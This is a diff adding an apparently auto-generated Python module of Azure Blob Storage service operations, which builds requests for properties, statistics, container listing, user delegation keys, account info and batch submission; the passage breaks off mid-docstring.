+1,1105 @@ +# pylint: disable=too-many-lines +# coding=utf-8 +# -------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for license information. +# Code generated by Microsoft (R) AutoRest Code Generator. +# Changes may cause incorrect behavior and will be lost if the code is regenerated. +# -------------------------------------------------------------------------- +from typing import TYPE_CHECKING + +from msrest import Serializer + +from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error +from azure.core.pipeline import PipelineResponse +from azure.core.pipeline.transport import HttpResponse +from azure.core.rest import HttpRequest +from azure.core.tracing.decorator import distributed_trace + +from .. import models as _models +from .._vendor import _convert_request, _format_url_section + +if TYPE_CHECKING: + # pylint: disable=unused-import,ungrouped-imports + from typing import Any, Callable, Dict, IO, List, Optional, TypeVar, Union + T = TypeVar('T') + ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]] + +_SERIALIZER = Serializer() +_SERIALIZER.client_side_validation = False +# fmt: off + +def build_set_properties_request( + url, # type: str + **kwargs # type: Any +): + # type: (...) 
-> HttpRequest + restype = kwargs.pop('restype', "service") # type: str + comp = kwargs.pop('comp', "properties") # type: str + version = kwargs.pop('version', "2021-04-10") # type: str + content_type = kwargs.pop('content_type', None) # type: Optional[str] + timeout = kwargs.pop('timeout', None) # type: Optional[int] + request_id_parameter = kwargs.pop('request_id_parameter', None) # type: Optional[str] + + accept = "application/xml" + # Construct URL + _url = kwargs.pop("template_url", "{url}") + path_format_arguments = { + "url": _SERIALIZER.url("url", url, 'str', skip_quote=True), + } + + _url = _format_url_section(_url, **path_format_arguments) + + # Construct parameters + _query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] + _query_parameters['restype'] = _SERIALIZER.query("restype", restype, 'str') + _query_parameters['comp'] = _SERIALIZER.query("comp", comp, 'str') + if timeout is not None: + _query_parameters['timeout'] = _SERIALIZER.query("timeout", timeout, 'int', minimum=0) + + # Construct headers + _header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] + _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str') + if request_id_parameter is not None: + _header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("request_id_parameter", request_id_parameter, 'str') + if content_type is not None: + _header_parameters['Content-Type'] = _SERIALIZER.header("content_type", content_type, 'str') + _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') + + return HttpRequest( + method="PUT", + url=_url, + params=_query_parameters, + headers=_header_parameters, + **kwargs + ) + + +def build_get_properties_request( + url, # type: str + **kwargs # type: Any +): + # type: (...) -> HttpRequest + restype = kwargs.pop('restype', "service") # type: str + comp = kwargs.pop('comp', "properties") # type: str + version = kwargs.pop('version', "2021-04-10") # type: str + timeout = kwargs.pop('timeout', None) # type: Optional[int] + request_id_parameter = kwargs.pop('request_id_parameter', None) # type: Optional[str] + + accept = "application/xml" + # Construct URL + _url = kwargs.pop("template_url", "{url}") + path_format_arguments = { + "url": _SERIALIZER.url("url", url, 'str', skip_quote=True), + } + + _url = _format_url_section(_url, **path_format_arguments) + + # Construct parameters + _query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] + _query_parameters['restype'] = _SERIALIZER.query("restype", restype, 'str') + _query_parameters['comp'] = _SERIALIZER.query("comp", comp, 'str') + if timeout is not None: + _query_parameters['timeout'] = _SERIALIZER.query("timeout", timeout, 'int', minimum=0) + + # Construct headers + _header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] + _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str') + if request_id_parameter is not None: + _header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("request_id_parameter", request_id_parameter, 'str') + _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') + + return HttpRequest( + method="GET", + url=_url, + params=_query_parameters, + headers=_header_parameters, + **kwargs + ) + + +def build_get_statistics_request( + url, # type: str + **kwargs # type: Any +): + # type: (...) 
-> HttpRequest + restype = kwargs.pop('restype', "service") # type: str + comp = kwargs.pop('comp', "stats") # type: str + version = kwargs.pop('version', "2021-04-10") # type: str + timeout = kwargs.pop('timeout', None) # type: Optional[int] + request_id_parameter = kwargs.pop('request_id_parameter', None) # type: Optional[str] + + accept = "application/xml" + # Construct URL + _url = kwargs.pop("template_url", "{url}") + path_format_arguments = { + "url": _SERIALIZER.url("url", url, 'str', skip_quote=True), + } + + _url = _format_url_section(_url, **path_format_arguments) + + # Construct parameters + _query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] + _query_parameters['restype'] = _SERIALIZER.query("restype", restype, 'str') + _query_parameters['comp'] = _SERIALIZER.query("comp", comp, 'str') + if timeout is not None: + _query_parameters['timeout'] = _SERIALIZER.query("timeout", timeout, 'int', minimum=0) + + # Construct headers + _header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] + _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str') + if request_id_parameter is not None: + _header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("request_id_parameter", request_id_parameter, 'str') + _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') + + return HttpRequest( + method="GET", + url=_url, + params=_query_parameters, + headers=_header_parameters, + **kwargs + ) + + +def build_list_containers_segment_request( + url, # type: str + **kwargs # type: Any +): + # type: (...) -> HttpRequest + comp = kwargs.pop('comp', "list") # type: str + version = kwargs.pop('version', "2021-04-10") # type: str + prefix = kwargs.pop('prefix', None) # type: Optional[str] + marker = kwargs.pop('marker', None) # type: Optional[str] + maxresults = kwargs.pop('maxresults', None) # type: Optional[int] + include = kwargs.pop('include', None) # type: Optional[List[Union[str, "_models.ListContainersIncludeType"]]] + timeout = kwargs.pop('timeout', None) # type: Optional[int] + request_id_parameter = kwargs.pop('request_id_parameter', None) # type: Optional[str] + + accept = "application/xml" + # Construct URL + _url = kwargs.pop("template_url", "{url}") + path_format_arguments = { + "url": _SERIALIZER.url("url", url, 'str', skip_quote=True), + } + + _url = _format_url_section(_url, **path_format_arguments) + + # Construct parameters + _query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] + _query_parameters['comp'] = _SERIALIZER.query("comp", comp, 'str') + if prefix is not None: + _query_parameters['prefix'] = _SERIALIZER.query("prefix", prefix, 'str') + if marker is not None: + _query_parameters['marker'] = _SERIALIZER.query("marker", marker, 'str') + if maxresults is not None: + _query_parameters['maxresults'] = _SERIALIZER.query("maxresults", maxresults, 'int', minimum=1) + if include is not None: + _query_parameters['include'] = _SERIALIZER.query("include", include, '[str]', div=',') + if timeout is not None: + _query_parameters['timeout'] = _SERIALIZER.query("timeout", timeout, 'int', minimum=0) + + # Construct headers + _header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] + _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str') + if request_id_parameter is not None: + _header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("request_id_parameter", request_id_parameter, 'str') + _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 
'str') + + return HttpRequest( + method="GET", + url=_url, + params=_query_parameters, + headers=_header_parameters, + **kwargs + ) + + +def build_get_user_delegation_key_request( + url, # type: str + **kwargs # type: Any +): + # type: (...) -> HttpRequest + restype = kwargs.pop('restype', "service") # type: str + comp = kwargs.pop('comp', "userdelegationkey") # type: str + version = kwargs.pop('version', "2021-04-10") # type: str + content_type = kwargs.pop('content_type', None) # type: Optional[str] + timeout = kwargs.pop('timeout', None) # type: Optional[int] + request_id_parameter = kwargs.pop('request_id_parameter', None) # type: Optional[str] + + accept = "application/xml" + # Construct URL + _url = kwargs.pop("template_url", "{url}") + path_format_arguments = { + "url": _SERIALIZER.url("url", url, 'str', skip_quote=True), + } + + _url = _format_url_section(_url, **path_format_arguments) + + # Construct parameters + _query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] + _query_parameters['restype'] = _SERIALIZER.query("restype", restype, 'str') + _query_parameters['comp'] = _SERIALIZER.query("comp", comp, 'str') + if timeout is not None: + _query_parameters['timeout'] = _SERIALIZER.query("timeout", timeout, 'int', minimum=0) + + # Construct headers + _header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] + _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str') + if request_id_parameter is not None: + _header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("request_id_parameter", request_id_parameter, 'str') + if content_type is not None: + _header_parameters['Content-Type'] = _SERIALIZER.header("content_type", content_type, 'str') + _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') + + return HttpRequest( + method="POST", + url=_url, + params=_query_parameters, + headers=_header_parameters, + **kwargs + ) + + +def build_get_account_info_request( + url, # type: str + **kwargs # type: Any +): + # type: (...) -> HttpRequest + restype = kwargs.pop('restype', "account") # type: str + comp = kwargs.pop('comp', "properties") # type: str + version = kwargs.pop('version', "2021-04-10") # type: str + + accept = "application/xml" + # Construct URL + _url = kwargs.pop("template_url", "{url}") + path_format_arguments = { + "url": _SERIALIZER.url("url", url, 'str', skip_quote=True), + } + + _url = _format_url_section(_url, **path_format_arguments) + + # Construct parameters + _query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] + _query_parameters['restype'] = _SERIALIZER.query("restype", restype, 'str') + _query_parameters['comp'] = _SERIALIZER.query("comp", comp, 'str') + + # Construct headers + _header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] + _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str') + _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') + + return HttpRequest( + method="GET", + url=_url, + params=_query_parameters, + headers=_header_parameters, + **kwargs + ) + + +def build_submit_batch_request( + url, # type: str + **kwargs # type: Any +): + # type: (...) 
-> HttpRequest + multipart_content_type = kwargs.pop('multipart_content_type') # type: str + comp = kwargs.pop('comp', "batch") # type: str + version = kwargs.pop('version', "2021-04-10") # type: str + content_length = kwargs.pop('content_length') # type: int + timeout = kwargs.pop('timeout', None) # type: Optional[int] + request_id_parameter = kwargs.pop('request_id_parameter', None) # type: Optional[str] + + accept = "application/xml" + # Construct URL + _url = kwargs.pop("template_url", "{url}") + path_format_arguments = { + "url": _SERIALIZER.url("url", url, 'str', skip_quote=True), + } + + _url = _format_url_section(_url, **path_format_arguments) + + # Construct parameters + _query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] + _query_parameters['comp'] = _SERIALIZER.query("comp", comp, 'str') + if timeout is not None: + _query_parameters['timeout'] = _SERIALIZER.query("timeout", timeout, 'int', minimum=0) + + # Construct headers + _header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] + _header_parameters['Content-Length'] = _SERIALIZER.header("content_length", content_length, 'long') + _header_parameters['Content-Type'] = _SERIALIZER.header("multipart_content_type", multipart_content_type, 'str') + _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str') + if request_id_parameter is not None: + _header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("request_id_parameter", request_id_parameter, 'str') + _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') + + return HttpRequest( + method="POST", + url=_url, + params=_query_parameters, + headers=_header_parameters, + **kwargs + ) + + +def build_filter_blobs_request( + url, # type: str + **kwargs # type: Any +): + # type: (...) 
-> HttpRequest + comp = kwargs.pop('comp', "blobs") # type: str + version = kwargs.pop('version', "2021-04-10") # type: str + timeout = kwargs.pop('timeout', None) # type: Optional[int] + request_id_parameter = kwargs.pop('request_id_parameter', None) # type: Optional[str] + where = kwargs.pop('where', None) # type: Optional[str] + marker = kwargs.pop('marker', None) # type: Optional[str] + maxresults = kwargs.pop('maxresults', None) # type: Optional[int] + + accept = "application/xml" + # Construct URL + _url = kwargs.pop("template_url", "{url}") + path_format_arguments = { + "url": _SERIALIZER.url("url", url, 'str', skip_quote=True), + } + + _url = _format_url_section(_url, **path_format_arguments) + + # Construct parameters + _query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] + _query_parameters['comp'] = _SERIALIZER.query("comp", comp, 'str') + if timeout is not None: + _query_parameters['timeout'] = _SERIALIZER.query("timeout", timeout, 'int', minimum=0) + if where is not None: + _query_parameters['where'] = _SERIALIZER.query("where", where, 'str') + if marker is not None: + _query_parameters['marker'] = _SERIALIZER.query("marker", marker, 'str') + if maxresults is not None: + _query_parameters['maxresults'] = _SERIALIZER.query("maxresults", maxresults, 'int', minimum=1) + + # Construct headers + _header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] + _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str') + if request_id_parameter is not None: + _header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("request_id_parameter", request_id_parameter, 'str') + _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') + + return HttpRequest( + method="GET", + url=_url, + params=_query_parameters, + headers=_header_parameters, + **kwargs + ) + +# fmt: on +class ServiceOperations(object): + """ + .. warning:: + **DO NOT** instantiate this class directly. + + Instead, you should access the following operations through + :class:`~azure.storage.blob.AzureBlobStorage`'s + :attr:`service` attribute. + """ + + models = _models + + def __init__(self, *args, **kwargs): + args = list(args) + self._client = args.pop(0) if args else kwargs.pop("client") + self._config = args.pop(0) if args else kwargs.pop("config") + self._serialize = args.pop(0) if args else kwargs.pop("serializer") + self._deserialize = args.pop(0) if args else kwargs.pop("deserializer") + + + @distributed_trace + def set_properties( # pylint: disable=inconsistent-return-statements + self, + storage_service_properties, # type: "_models.StorageServiceProperties" + timeout=None, # type: Optional[int] + request_id_parameter=None, # type: Optional[str] + **kwargs # type: Any + ): + # type: (...) -> None + """Sets properties for a storage account's Blob service endpoint, including properties for Storage + Analytics and CORS (Cross-Origin Resource Sharing) rules. + + :param storage_service_properties: The StorageService properties. + :type storage_service_properties: ~azure.storage.blob.models.StorageServiceProperties + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. 
+ :type request_id_parameter: str + :keyword restype: restype. Default value is "service". Note that overriding this default value + may result in unsupported behavior. + :paramtype restype: str + :keyword comp: comp. Default value is "properties". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + restype = kwargs.pop('restype', "service") # type: str + comp = kwargs.pop('comp', "properties") # type: str + content_type = kwargs.pop('content_type', "application/xml") # type: Optional[str] + + _content = self._serialize.body(storage_service_properties, 'StorageServiceProperties', is_xml=True) + + request = build_set_properties_request( + url=self._config.url, + restype=restype, + comp=comp, + version=self._config.version, + content_type=content_type, + content=_content, + timeout=timeout, + request_id_parameter=request_id_parameter, + template_url=self.set_properties.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [202]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + set_properties.metadata = {'url': "{url}"} # type: ignore + + + @distributed_trace + def get_properties( + self, + timeout=None, # type: Optional[int] + request_id_parameter=None, # type: Optional[str] + **kwargs # type: Any + ): + # type: (...) -> "_models.StorageServiceProperties" + """Gets the properties of a storage account's Blob service, including properties for Storage + Analytics and CORS (Cross-Origin Resource Sharing) rules. + + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :keyword restype: restype. Default value is "service". Note that overriding this default value + may result in unsupported behavior. + :paramtype restype: str + :keyword comp: comp. Default value is "properties". Note that overriding this default value may + result in unsupported behavior.
+ :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: StorageServiceProperties, or the result of cls(response) + :rtype: ~azure.storage.blob.models.StorageServiceProperties + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType["_models.StorageServiceProperties"] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + restype = kwargs.pop('restype', "service") # type: str + comp = kwargs.pop('comp', "properties") # type: str + + + request = build_get_properties_request( + url=self._config.url, + restype=restype, + comp=comp, + version=self._config.version, + timeout=timeout, + request_id_parameter=request_id_parameter, + template_url=self.get_properties.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + + deserialized = self._deserialize('StorageServiceProperties', pipeline_response) + + if cls: + return cls(pipeline_response, deserialized, response_headers) + + return deserialized + + get_properties.metadata = {'url': "{url}"} # type: ignore + + + @distributed_trace + def get_statistics( + self, + timeout=None, # type: Optional[int] + request_id_parameter=None, # type: Optional[str] + **kwargs # type: Any + ): + # type: (...) -> "_models.StorageServiceStats" + """Retrieves statistics related to replication for the Blob service. It is only available on the + secondary location endpoint when read-access geo-redundant replication is enabled for the + storage account. + + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :keyword restype: restype. Default value is "service". Note that overriding this default value + may result in unsupported behavior. + :paramtype restype: str + :keyword comp: comp. Default value is "stats". Note that overriding this default value may + result in unsupported behavior. 
+ :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: StorageServiceStats, or the result of cls(response) + :rtype: ~azure.storage.blob.models.StorageServiceStats + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType["_models.StorageServiceStats"] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + restype = kwargs.pop('restype', "service") # type: str + comp = kwargs.pop('comp', "stats") # type: str + + + request = build_get_statistics_request( + url=self._config.url, + restype=restype, + comp=comp, + version=self._config.version, + timeout=timeout, + request_id_parameter=request_id_parameter, + template_url=self.get_statistics.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + deserialized = self._deserialize('StorageServiceStats', pipeline_response) + + if cls: + return cls(pipeline_response, deserialized, response_headers) + + return deserialized + + get_statistics.metadata = {'url': "{url}"} # type: ignore + + + @distributed_trace + def list_containers_segment( + self, + prefix=None, # type: Optional[str] + marker=None, # type: Optional[str] + maxresults=None, # type: Optional[int] + include=None, # type: Optional[List[Union[str, "_models.ListContainersIncludeType"]]] + timeout=None, # type: Optional[int] + request_id_parameter=None, # type: Optional[str] + **kwargs # type: Any + ): + # type: (...) -> "_models.ListContainersSegmentResponse" + """The List Containers Segment operation returns a list of the containers under the specified + account. + + :param prefix: Filters the results to return only containers whose name begins with the + specified prefix. Default value is None. + :type prefix: str + :param marker: A string value that identifies the portion of the list of containers to be + returned with the next listing operation. The operation returns the NextMarker value within the + response body if the listing operation did not return all containers remaining to be listed + with the current page. The NextMarker value can be used as the value for the marker parameter + in a subsequent call to request the next page of list items. The marker value is opaque to the + client. Default value is None. + :type marker: str + :param maxresults: Specifies the maximum number of containers to return. If the request does + not specify maxresults, or specifies a value greater than 5000, the server will return up to + 5000 items. 
Note that if the listing operation crosses a partition boundary, then the service + will return a continuation token for retrieving the remainder of the results. For this reason, + it is possible that the service will return fewer results than specified by maxresults, or than + the default of 5000. Default value is None. + :type maxresults: int + :param include: Include this parameter to specify that the container's metadata be returned as + part of the response body. Default value is None. + :type include: list[str or ~azure.storage.blob.models.ListContainersIncludeType] + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :keyword comp: comp. Default value is "list". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: ListContainersSegmentResponse, or the result of cls(response) + :rtype: ~azure.storage.blob.models.ListContainersSegmentResponse + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType["_models.ListContainersSegmentResponse"] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "list") # type: str + + + request = build_list_containers_segment_request( + url=self._config.url, + comp=comp, + version=self._config.version, + prefix=prefix, + marker=marker, + maxresults=maxresults, + include=include, + timeout=timeout, + request_id_parameter=request_id_parameter, + template_url=self.list_containers_segment.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + + deserialized = self._deserialize('ListContainersSegmentResponse', pipeline_response) + + if cls: + return cls(pipeline_response, deserialized, response_headers) + + return deserialized + + list_containers_segment.metadata = {'url': "{url}"} # type: ignore + + + @distributed_trace + def get_user_delegation_key( + self, + key_info, # type: "_models.KeyInfo" + timeout=None, # type: Optional[int] + request_id_parameter=None, # type: Optional[str] + **kwargs # type: Any + ): + # type: (...) -> "_models.UserDelegationKey" + """Retrieves a user delegation key for the Blob service. 
This is only a valid operation when using + bearer token authentication. + + :param key_info: Key information. + :type key_info: ~azure.storage.blob.models.KeyInfo + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :keyword restype: restype. Default value is "service". Note that overriding this default value + may result in unsupported behavior. + :paramtype restype: str + :keyword comp: comp. Default value is "userdelegationkey". Note that overriding this default + value may result in unsupported behavior. + :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: UserDelegationKey, or the result of cls(response) + :rtype: ~azure.storage.blob.models.UserDelegationKey + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType["_models.UserDelegationKey"] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + restype = kwargs.pop('restype', "service") # type: str + comp = kwargs.pop('comp', "userdelegationkey") # type: str + content_type = kwargs.pop('content_type', "application/xml") # type: Optional[str] + + _content = self._serialize.body(key_info, 'KeyInfo', is_xml=True) + + request = build_get_user_delegation_key_request( + url=self._config.url, + restype=restype, + comp=comp, + version=self._config.version, + content_type=content_type, + content=_content, + timeout=timeout, + request_id_parameter=request_id_parameter, + template_url=self.get_user_delegation_key.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + deserialized = self._deserialize('UserDelegationKey', pipeline_response) + + if cls: + return cls(pipeline_response, deserialized, response_headers) + + return deserialized + + get_user_delegation_key.metadata = {'url': "{url}"} # type: ignore + + + @distributed_trace + def get_account_info( # pylint: disable=inconsistent-return-statements + self, + **kwargs # type: Any + ): + # type: (...) -> None + """Returns the sku name and account kind. + + :keyword restype: restype. Default value is "account". 
Note that overriding this default value + may result in unsupported behavior. + :paramtype restype: str + :keyword comp: comp. Default value is "properties". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + restype = kwargs.pop('restype', "account") # type: str + comp = kwargs.pop('comp', "properties") # type: str + + + request = build_get_account_info_request( + url=self._config.url, + restype=restype, + comp=comp, + version=self._config.version, + template_url=self.get_account_info.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + response_headers['x-ms-sku-name']=self._deserialize('str', response.headers.get('x-ms-sku-name')) + response_headers['x-ms-account-kind']=self._deserialize('str', response.headers.get('x-ms-account-kind')) + response_headers['x-ms-is-hns-enabled']=self._deserialize('bool', response.headers.get('x-ms-is-hns-enabled')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + get_account_info.metadata = {'url': "{url}"} # type: ignore + + + @distributed_trace + def submit_batch( + self, + content_length, # type: int + body, # type: IO + timeout=None, # type: Optional[int] + request_id_parameter=None, # type: Optional[str] + **kwargs # type: Any + ): + # type: (...) -> IO + """The Batch operation allows multiple API calls to be embedded into a single HTTP request. + + :param content_length: The length of the request. + :type content_length: long + :param body: Initial data. + :type body: IO + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :keyword multipart_content_type: Required. The value of this header must be multipart/mixed + with a batch boundary. Example header value: multipart/mixed; boundary=batch_:code:``. 
